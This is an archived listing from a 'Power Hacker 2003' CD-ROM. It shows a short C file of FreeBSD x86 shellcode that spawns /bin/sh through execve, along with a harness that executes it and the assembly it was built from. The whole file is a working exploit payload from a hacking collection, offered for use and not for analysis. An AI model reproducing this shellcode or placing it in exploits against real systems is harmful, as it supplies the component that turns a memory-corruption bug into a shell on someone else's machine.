home *** CD-ROM | disk | FTP | other *** search
/ Power Hacker 2003 / Power_Hacker_2003.iso / Exploit and vulnerability / hack.co.za / shellcode / freebsd / execve-binsh.c < prev    next >
Encoding:
C/C++ Source or Header  |  2001-01-17  |  1.4 KB  |  36 lines
  1. /* This is FreeBSD execve code.It is only 25 bytes long.This kind of making *
  2.  * shell codes was published by anathema(all credits go to him). I just     *
  3.  * rewrote it for FreeBSD                                                   *
  4.  *                                        signed predator                   *
  5.  *                                        linux registered user : 181116    *
  6.  *                                        preedator(at)sendmail(dot)ru      */
  7.  
  8. char sc[]=
  9. "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
  10. "\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53"
  11. "\xb0\x3b\x50\xcd\x80";
  12.  
  13. int main(){
  14.  void (*s)()=(void *)sc;
  15.  printf("len : %d\n",strlen(sc));
  16.  s();
  17. }
  18.  
  19. //Asm code
  20. /************************************
  21.  *int main(){                       *
  22.  *__asm__(" xorl %eax, %eax   \n"   *
  23.  *        " pushl %eax        \n"   *
  24.  *        " pushl $0x68732f2f \n"   *
  25.  *        " pushl $0x6e69622f \n"   *
  26.  *        " movl %esp,%ebx    \n"   *
  27.  *        " pushl %eax        \n"   *
  28.  *        " pushl %ebx        \n"   *   <<--- push %esp will work too :o)
  29.  *        " pushl %eax        \n"   *
  30.  *        " pushl %esp        \n"   *
  31.  *        " pushl %ebx        \n"   *
  32.  *        " movb $0x3b,%al    \n"   *
  33.  *        " pushl %eax        \n"   *
  34.  *        " int $0x80         \n"); *
  35.  *}                                 *
  36.  ************************************/